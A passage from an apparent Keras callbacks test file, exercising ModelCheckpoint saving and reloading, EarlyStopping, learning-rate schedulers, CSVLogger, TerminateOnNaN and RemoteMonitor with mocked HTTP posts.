assert not os.path.exists(filepath.format(epoch=4))
assert os.path.exists(filepath.format(epoch=5))
assert not os.path.exists(filepath.format(epoch=6))
assert os.path.exists(filepath.format(epoch=10))
os.remove(filepath.format(epoch=5))
os.remove(filepath.format(epoch=10))
# Case 8: `ModelCheckpoint` with an integer `save_freq`
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq=15,
period=100) # The period should be ignored (this test tests this).
]
assert not os.path.exists(filepath.format(epoch=3))
model.fit(
x_train,
y_train,
batch_size=2,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=10,
verbose=1)
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=3))
assert not os.path.exists(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=5))
assert os.path.exists(filepath.format(epoch=6))
assert not os.path.exists(filepath.format(epoch=7))
assert not os.path.exists(filepath.format(epoch=8))
assert os.path.exists(filepath.format(epoch=9))
os.remove(filepath.format(epoch=3))
os.remove(filepath.format(epoch=6))
os.remove(filepath.format(epoch=9))
# Case 9: `ModelCheckpoint` with valid and invalid save_freq argument.
with self.assertRaisesRegex(ValueError, 'Unrecognized save_freq'):
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq='invalid_save_freq')
# The following should not raise ValueError.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq='epoch')
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq=3)
# Case 10: `ModelCheckpoint` with valid and invalid `options` argument.
with self.assertRaisesRegex(TypeError, 'tf.train.CheckpointOptions'):
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
save_weights_only=True,
mode=mode,
options=tf.saved_model.SaveOptions())
with self.assertRaisesRegex(TypeError, 'tf.saved_model.SaveOptions'):
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
save_weights_only=False,
mode=mode,
options=tf.train.CheckpointOptions())
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
save_weights_only=True,
mode=mode,
options=tf.train.CheckpointOptions())
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
save_weights_only=False,
mode=mode,
options=tf.saved_model.SaveOptions())
# Case 11: `ModelCheckpoint` save model with batch number in filename.
filepath = os.path.join(temp_dir,
'checkpoint.epoch{epoch:02d}batch{batch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(filepath, monitor=monitor, save_freq=1)
]
assert not os.path.exists(filepath.format(epoch=1, batch=1))
assert not os.path.exists(filepath.format(epoch=1, batch=2))
assert not os.path.exists(filepath.format(epoch=2, batch=1))
assert not os.path.exists(filepath.format(epoch=2, batch=2))
assert not os.path.exists(filepath.format(epoch=3, batch=1))
assert not os.path.exists(filepath.format(epoch=3, batch=2))
assert not os.path.exists(filepath.format(epoch=4, batch=1))
assert not os.path.exists(filepath.format(epoch=4, batch=2))
assert not os.path.exists(filepath.format(epoch=5, batch=1))
assert not os.path.exists(filepath.format(epoch=5, batch=2))
model.fit(
x_train,
y_train,
batch_size=5,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=1)
assert os.path.exists(filepath.format(epoch=1, batch=1))
assert os.path.exists(filepath.format(epoch=1, batch=2))
assert os.path.exists(filepath.format(epoch=2, batch=1))
assert os.path.exists(filepath.format(epoch=2, batch=2))
assert os.path.exists(filepath.format(epoch=3, batch=1))
assert os.path.exists(filepath.format(epoch=3, batch=2))
assert os.path.exists(filepath.format(epoch=4, batch=1))
assert os.path.exists(filepath.format(epoch=4, batch=2))
assert os.path.exists(filepath.format(epoch=5, batch=1))
assert os.path.exists(filepath.format(epoch=5, batch=2))
os.remove(filepath.format(epoch=1, batch=1))
os.remove(filepath.format(epoch=1, batch=2))
os.remove(filepath.format(epoch=2, batch=1))
os.remove(filepath.format(epoch=2, batch=2))
os.remove(filepath.format(epoch=3, batch=1))
os.remove(filepath.format(epoch=3, batch=2))
os.remove(filepath.format(epoch=4, batch=1))
os.remove(filepath.format(epoch=4, batch=2))
os.remove(filepath.format(epoch=5, batch=1))
os.remove(filepath.format(epoch=5, batch=2))
@testing_utils.run_v2_only
def test_ModelCheckpoint_subclass_save_weights_false(self):
model = testing_utils.get_small_subclass_mlp(NUM_HIDDEN, NUM_CLASSES)
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'checkpoint')
cbks = [keras.callbacks.ModelCheckpoint(
filepath, save_weights_only=False)]
(x_train, y_train), _ = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_train = np_utils.to_categorical(y_train, num_classes=NUM_CLASSES)
model.fit(
x_train,
y_train,
callbacks=cbks,
epochs=1,
verbose=0)
# Check that the filepath is a SavedModel directory.
self.assertIn('saved_model.pb', os.listdir(filepath))
def _get_dummy_resource_for_model_checkpoint_testing(self):
def get_input_datasets():
# Simple training input.
train_input = [[1.]] * 16
train_label = [[0.]] * 16
ds = tf.data.Dataset.from_tensor_slices((train_input, train_label))
return ds.batch(8, drop_remainder=True)
# Very simple bias model to eliminate randomness.
optimizer = gradient_descent.SGD(0.1)
model = sequential.Sequential()
model.add(testing_utils.Bias(input_shape=(1,)))
model.compile(loss='mae', optimizer=optimizer, metrics=['mae'])
train_ds = get_input_datasets()
temp_dir = self.get_temp_dir()
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
# The filepath shouldn't exist at the beginning.
self.assertFalse(os.path.exists(filepath))
callback = keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=True)
return model, train_ds, callback, filepath
def _run_load_weights_on_restart_test_common_iterations(self):
(model, train_ds, callback,
filepath) = self._get_dummy_resource_for_model_checkpoint_testing()
initial_epochs = 3
model.fit(train_ds, epochs=initial_epochs, callbacks=[callback])
# The files should exist after fitting with callback.
for epoch in range(initial_epochs):
self.assertTrue(os.path.exists(filepath.format(epoch=epoch + 1)))
self.assertFalse(os.path.exists(filepath.format(epoch=initial_epochs + 1)))
self.assertEqual(
callback._get_most_recently_modified_file_matching_pattern(filepath),
filepath.format(epoch=initial_epochs))
model.fit(train_ds, epochs=1)
weights_after_one_more_epoch = model.get_weights()
# The filepath should continue to exist after fitting without callback.
for epoch in range(initial_epochs):
self.assertTrue(os.path.exists(filepath.format(epoch=epoch + 1)))
return model, train_ds, filepath, weights_after_one_more_epoch
@staticmethod
def get_ModelCheckpoint_load_weights_on_restart_true_test(save_weights_only):
def func(self):
(model, train_ds, filepath, weights_after_one_more_epoch
) = self._run_load_weights_on_restart_test_common_iterations()
# Sleep for some short time period ensuring the files are created with
# a different time (in MacOS OSS the granularity is only 1 second).
time.sleep(2)
callback = keras.callbacks.ModelCheckpoint(
filepath=filepath,
save_weights_only=save_weights_only,
load_weights_on_restart=True)
model.fit(train_ds, epochs=1, callbacks=[callback])
weights_after_model_restoring_and_one_more_epoch = model.get_weights()
self.assertEqual(
callback._get_most_recently_modified_file_matching_pattern(filepath),
filepath.format(epoch=1))
model.fit(
train_ds,
epochs=1,
callbacks=[
keras.callbacks.ModelCheckpoint(
filepath=filepath,
save_weights_only=save_weights_only,
load_weights_on_restart=True)
])
weights_with_one_final_extra_epoch = model.get_weights()
# Asserting the weights one epoch after initial fitting and another epoch
# after that are closed, if a ModelCheckpoint with
# load_weights_on_restart=True is given (so the model is restored at the
# beginning of training).
self.assertAllClose(weights_after_one_more_epoch,
weights_after_model_restoring_and_one_more_epoch)
self.assertNotAllClose(weights_after_one_more_epoch,
weights_with_one_final_extra_epoch)
return func
@staticmethod
def get_ModelCheckpoint_load_weights_on_restart_false_test(save_weights_only):
def func(self):
(model, train_ds, filepath, weights_after_one_more_epoch
) = self._run_load_weights_on_restart_test_common_iterations()
model.fit(
train_ds,
epochs=1,
callbacks=[
keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=save_weights_only)
])
weights_after_model_restoring_and_one_more_epoch = model.get_weights()
# Asserting the weights one epoch after initial fitting and another epoch
# after that are different, if a ModelCheckpoint with
# load_weights_on_restart=False is given (so the model is not restored at
# the beginning of training).
self.assertNotAllClose(weights_after_one_more_epoch,
weights_after_model_restoring_and_one_more_epoch)
return func
test_model_checkpoint_load_weights_on_restart_true_save_weights_only_true = \
get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(True)
test_model_checkpoint_load_weights_on_restart_true_save_weights_only_false = \
get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(False)
test_model_checkpoint_load_weights_on_restart_false_save_weights_only_true = \
get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(True)
test_model_checkpoint_load_weights_on_restart_false_save_weights_only_false \
= get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(False)
def test_ModelCheckpoint_override_if_file_exist(self):
(model, train_ds, filepath,
_) = self._run_load_weights_on_restart_test_common_iterations()
# Sleep for some short time period to ensure the files are created with
# a different time (in MacOS OSS the granularity is only 1 second).
time.sleep(2)
callback = keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=True)
model.load_weights(
callback._get_most_recently_modified_file_matching_pattern(filepath))
weights_before_additional_fit = model.get_weights()
model.fit(train_ds, epochs=1, callbacks=[callback])
model.load_weights(
callback._get_most_recently_modified_file_matching_pattern(filepath))
weights_after_additional_fit = model.get_weights()
self.assertNotAllClose(weights_before_additional_fit,
weights_after_additional_fit)
def test_fit_with_ModelCheckpoint_with_tf_config(self):
(model, train_ds, callback,
_) = self._get_dummy_resource_for_model_checkpoint_testing()
os.environ['TF_CONFIG'] = json.dumps({
'cluster': {
'worker': ['localhost:23333']
},
'task': {
'type': 'worker',
'index': 0
}
})
# `model.fit()` should work regardless of the presence of `TF_CONFIG`.
model.fit(train_ds, epochs=1, callbacks=[callback])
def test_fit_with_ModelCheckpoint_with_dir_as_h5_filepath(self):
(model, train_ds, callback,
filepath) = self._get_dummy_resource_for_model_checkpoint_testing()
temp_dir = self.get_temp_dir()
filepath = os.path.join(temp_dir, 'temp.h5')
self.assertFalse(os.path.exists(filepath))
os.mkdir(filepath)
self.assertTrue(os.path.exists(filepath))
callback = keras.callbacks.ModelCheckpoint(filepath=filepath)
with self.assertRaisesRegex(
IOError, 'Please specify a non-directory '
'filepath for ModelCheckpoint.'):
model.fit(train_ds, epochs=1, callbacks=[callback])
def test_ModelCheckpoint_with_bad_path_placeholders(self):
(model, train_ds, callback,
filepath) = self._get_dummy_resource_for_model_checkpoint_testing()
temp_dir = self.get_temp_dir()
filepath = os.path.join(temp_dir, 'chkpt_{epoch:02d}_{mape:.2f}.h5')
callback = keras.callbacks.ModelCheckpoint(filepath=filepath)
with self.assertRaisesRegex(KeyError, 'Failed to format this callback '
'filepath.*'):
model.fit(train_ds, epochs=1, callbacks=[callback])
def test_ModelCheckpoint_nonblocking(self):
filepath = self.get_temp_dir()
# Should only cause a sync block when saving is actually performed.
callback = keras.callbacks.ModelCheckpoint(filepath=filepath, save_freq=100)
self.assertTrue(callback._supports_tf_logs)
model = keras.Sequential([keras.layers.Dense(1)])
cb_list = keras.callbacks.CallbackList([callback],
model=model,
epochs=1,
steps=10,
verbose=0)
tensor = tf.convert_to_tensor(1.)
def mock_numpy():
raise RuntimeError(
'If this error is seen, ModelCheckpoint is causing a blocking '
'NumPy conversion even when not checkpointing.')
tensor.numpy = mock_numpy
logs = {'metric': tensor}
cb_list.on_train_begin(logs)
cb_list.on_epoch_begin(0, logs)
cb_list.on_train_batch_begin(0, logs)
cb_list.on_train_batch_end(0, logs)
cb_list.on_epoch_end(0, logs)
cb_list.on_train_end(logs)
cb_list.on_test_begin(logs)
cb_list.on_test_batch_begin(0, logs)
cb_list.on_test_batch_end(0, logs)
cb_list.on_test_end(logs)
cb_list.on_predict_begin(logs)
cb_list.on_predict_batch_begin(logs)
cb_list.on_predict_batch_end(logs)
cb_list.on_predict_end(logs)
def test_verbose_2_logging(self):
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = keras.models.Sequential((keras.layers.Dense(
1, input_dim=1, activation='relu'), keras.layers.Dense(
1, activation='sigmoid'),))
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
expected_log = r'(.*- loss:.*- acc.*:.*epoch)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(data, labels, verbose=2, epochs=20)
self.assertRegex(printed.contents(), expected_log)
def test_ProgbarLogger_verbose_2_nonblocking(self):
# Should only cause a sync block on epoch end methods.
callback = keras.callbacks.ProgbarLogger(count_mode='steps')
self.assertTrue(callback._supports_tf_logs)
model = keras.Sequential([keras.layers.Dense(1)])
cb_list = keras.callbacks.CallbackList([callback],
model=model,
epochs=1,
steps=10,
verbose=2)
tensor = tf.convert_to_tensor(1.)
def mock_numpy():
raise RuntimeError(
'If this error is seen, ModelCheckpoint is causing a blocking '
'NumPy conversion even when not checkpointing.')
tensor.numpy = mock_numpy
logs = {'metric': tensor}
cb_list.on_train_begin(logs)
cb_list.on_epoch_begin(0, logs)
cb_list.on_train_batch_begin(0, logs)
cb_list.on_train_batch_end(0, logs)
cb_list.on_test_begin(logs)
cb_list.on_test_batch_begin(0, logs)
cb_list.on_test_batch_end(0, logs)
cb_list.on_test_end(logs)
with self.assertRaisesRegex(RuntimeError, 'NumPy conversion'):
# on_epoch_end should still block.
cb_list.on_epoch_end(0, logs)
cb_list.on_train_end(logs)
def test_EarlyStopping(self):
with self.cached_session():
np.random.seed(123)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
cases = [
('max', 'val_acc'),
('min', 'val_loss'),
('auto', 'val_acc'),
('auto', 'loss'),
('unknown', 'unknown')
]
for mode, monitor in cases:
patience = 0
cbks = [
keras.callbacks.EarlyStopping(
patience=patience, monitor=monitor, mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
def test_EarlyStopping_reuse(self):
with self.cached_session():
np.random.seed(1337)
patience = 3
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = keras.models.Sequential((keras.layers.Dense(
1, input_dim=1, activation='relu'), keras.layers.Dense(
1, activation='sigmoid'),))
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
weights = model.get_weights()
# This should allow training to go for at least `patience` epochs
model.set_weights(weights)
stopper = keras.callbacks.EarlyStopping(monitor='acc', patience=patience)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_with_baseline(self):
with self.cached_session():
np.random.seed(1337)
baseline = 0.6
(data, labels), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=50,
input_shape=(1,),
num_classes=NUM_CLASSES)
model = testing_utils.get_small_sequential_mlp(
num_hidden=1, num_classes=1, input_dim=1)
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['acc'])
stopper = keras.callbacks.EarlyStopping(monitor='acc',
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) == 2
patience = 3
stopper = keras.callbacks.EarlyStopping(monitor='acc',
patience=patience,
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_final_weights_when_restoring_model_weights(self):
class DummyModel:
def __init__(self):
self.stop_training = False
self.weights = -1
def get_weights(self):
return self.weights
def set_weights(self, weights):
self.weights = weights
def set_weight_to_epoch(self, epoch):
self.weights = epoch
early_stop = keras.callbacks.EarlyStopping(monitor='val_loss',
patience=2,
restore_best_weights=True)
early_stop.model = DummyModel()
losses = [0.2, 0.15, 0.1, 0.11, 0.12]
# The best configuration is in the epoch 2 (loss = 0.1000).
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.model.set_weight_to_epoch(epoch=epoch)
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
# The best configuration is in epoch 2 (loss = 0.1000),
# and while patience = 2, we're restoring the best weights,
# so we end up at the epoch with the best weights, i.e. epoch 2
self.assertEqual(early_stop.model.get_weights(), 2)
# Check early stopping when no model beats the baseline.
early_stop = keras.callbacks.EarlyStopping(
monitor='val_loss', patience=5, baseline=0.5, restore_best_weights=True)
early_stop.model = DummyModel()
losses = [0.9, 0.8, 0.7, 0.71, 0.72, 0.73]
# The best configuration is in the epoch 2 (loss = 0.7000).
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.model.set_weight_to_epoch(epoch=epoch)
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
# No epoch improves on the baseline, so we should train for only 5 epochs,
# and restore the second model.
self.assertEqual(epochs_trained, 5)
self.assertEqual(early_stop.model.get_weights(), 2)
def test_RemoteMonitor(self):
if requests is None:
self.skipTest('`requests` required to run this test')
return None
monitor = keras.callbacks.RemoteMonitor()
# This will raise a warning since the default address in unreachable:
monitor.on_epoch_end(0, logs={'loss': 0.})
def test_LearningRateScheduler(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [
keras.callbacks.LearningRateScheduler(
lambda x: 1. / (1. + x), verbose=1)
]
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5)
self.assertIn('LearningRateScheduler setting learning rate to 1.0',
printed.contents())
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.2) < keras.backend.epsilon()
cbks = [keras.callbacks.LearningRateScheduler(lambda x, lr: lr / 2)]
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.01 / 4) < keras.backend.epsilon()
cbks = [
keras.callbacks.LearningRateScheduler(
lambda epoch, _: learning_rate_schedule.CosineDecay(0.01, 2)
(epoch))
]
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
cosine_decay_np = 0.5 * (1 + np.cos(np.pi * (1 / 2)))
decayed_learning_rate = 0.01 * cosine_decay_np
assert (float(keras.backend.get_value(model.optimizer.lr)) -
decayed_learning_rate) < keras.backend.epsilon()
def test_ReduceLROnPlateau(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def make_model():
tf.compat.v1.set_random_seed(1234)
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=gradient_descent.SGD(lr=0.1))
return model
# TODO(psv): Make sure the callback works correctly when min_delta is
# set as 0. Test fails when the order of this callback and assertion is
# interchanged.
model = make_model()
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=0,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.1, atol=1e-4)
model = make_model()
# This should reduce the LR after the first epoch (due to high epsilon).
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=10,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=2)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.01, atol=1e-4)
def test_ReduceLROnPlateau_patience(self):
class DummyOptimizer:
def __init__(self):
self.lr = keras.backend.variable(1.0)
class DummyModel:
def __init__(self):
self.optimizer = DummyOptimizer()
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(
monitor='val_loss', patience=2)
reduce_on_plateau.model = DummyModel()
losses = [0.0860, 0.1096, 0.1040]
lrs = []
for epoch in range(len(losses)):
reduce_on_plateau.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
lrs.append(keras.backend.get_value(reduce_on_plateau.model.optimizer.lr))
# The learning rates should be 1.0 except the last one
for lr in lrs[:-1]:
self.assertEqual(lr, 1.0)
self.assertLess(lrs[-1], 1.0)
def test_ReduceLROnPlateau_backwards_compatibility(self):
with tf.compat.v1.test.mock.patch.object(logging, 'warning') as mock_log:
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(epsilon=1e-13)
self.assertRegex(
str(mock_log.call_args), '`epsilon` argument is deprecated')
self.assertFalse(hasattr(reduce_on_plateau, 'epsilon'))
self.assertTrue(hasattr(reduce_on_plateau, 'min_delta'))
self.assertEqual(reduce_on_plateau.min_delta, 1e-13)
def test_CSVLogger(self):
with self.cached_session():
np.random.seed(1337)
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'log.tsv')
sep = '\t'
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=gradient_descent.SGD(lr=0.1),
metrics=['accuracy'])
return model
# case 1, create new file with defined separator
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
with open(filepath) as csvfile:
dialect = csv.Sniffer().sniff(csvfile.read())
assert dialect.delimiter == sep
del model
del cbks
# case 2, append data to existing file, skip header
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep, append=True)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# case 3, reuse of CSVLogger object
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
with open(filepath) as csvfile:
list_lines = csvfile.readlines()
for line in list_lines:
assert line.count(sep) == 4
assert len(list_lines) == 5
output = ' '.join(list_lines)
assert len(re.findall('epoch', output)) == 1
os.remove(filepath)
def test_stop_training_csv(self):
# Test that using the CSVLogger callback with the TerminateOnNaN callback
# does not result in invalid CSVs.
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
with self.cached_session():
fp = os.path.join(tmpdir, 'test.csv')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN(), keras.callbacks.CSVLogger(fp)]
model = keras.models.Sequential()
for _ in range(5):
model.add(keras.layers.Dense(2, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='linear'))
model.compile(loss='mean_squared_error',
optimizer='rmsprop')
def data_generator():
i = 0
max_batch_index = len(x_train) // BATCH_SIZE
tot = 0
while 1:
if tot > 3 * len(x_train):
yield (np.ones([BATCH_SIZE, INPUT_DIM]) * np.nan,
np.ones([BATCH_SIZE, NUM_CLASSES]) * np.nan)
else:
yield (x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE],
y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE])
i += 1
tot += 1
i %= max_batch_index
history = model.fit_generator(data_generator(),
len(x_train) // BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
assert len(loss) > 1
assert loss[-1] == np.inf or np.isnan(loss[-1])
values = []
with open(fp) as f:
for x in csv.reader(f):
# In windows, due to \r\n line ends we may end up reading empty lines
# after each line. Skip empty lines.
if x:
values.append(x)
assert 'nan' in values[-1], 'The last epoch was not logged.'
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_TerminateOnNaN(self):
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN()]
model = keras.models.Sequential()
initializer = keras.initializers.Constant(value=1e5)
for _ in range(5):
model.add(
keras.layers.Dense(
2,
input_dim=INPUT_DIM,
activation='relu',
kernel_initializer=initializer))
model.add(keras.layers.Dense(NUM_CLASSES))
model.compile(loss='mean_squared_error', optimizer='rmsprop')
history = model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
self.assertEqual(len(loss), 1)
self.assertTrue(np.isnan(loss[0]) or np.isinf(loss[0]))
@unittest.skipIf(
os.name == 'nt',
'use_multiprocessing=True does not work on windows properly.')
def test_LambdaCallback(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# Start an arbitrary process that should run during model
# training and be terminated after training has completed.
e = threading.Event()
def target():
e.wait()
t = threading.Thread(target=target)
t.start()
cleanup_callback = keras.callbacks.LambdaCallback(
on_train_end=lambda logs: e.set())
cbks = [cleanup_callback]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
t.join()
assert not t.is_alive()
def test_RemoteMonitor_np_array(self):
if requests is None:
self.skipTest('`requests` required to run this test')
with tf.compat.v1.test.mock.patch.object(requests, 'post') as requests_post:
monitor = keras.callbacks.RemoteMonitor(send_as_json=True)
a = np.arange(1) # a 1 by 1 array
logs = {'loss': 0., 'val': a}
monitor.on_epoch_end(0, logs=logs)
send = {'loss': 0., 'epoch': 0, 'val': 0}
requests_post.assert_called_once_with(
monitor.root + monitor.path, json=send, headers=monitor.headers)
def test_RemoteMonitor_np_float32(self):
if requests is None:
self.skipTest('`requests` required to run this test')
with tf.compat.v1.test.mock.patch.object(requests, 'post') as requests_post:
monitor = keras.callbacks.RemoteMonitor(send_as_json=True)
a = np.float32(1.0) # a float32 generic type
logs = {'loss': 0., 'val': a}
monitor.on_epoch_end(0, logs=logs)
send = {'loss': 0., 'epoch': 0, 'val': 1.0}
requests_post.assert_called_once_with(
monitor.root + monitor.path, json=send, headers=monitor.headers)
def test_RemoteMonitorWithJsonPayload(self):
if requests is None:
self.skipTest('`requests` required to run this test')
return None
with self.cached_session():
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
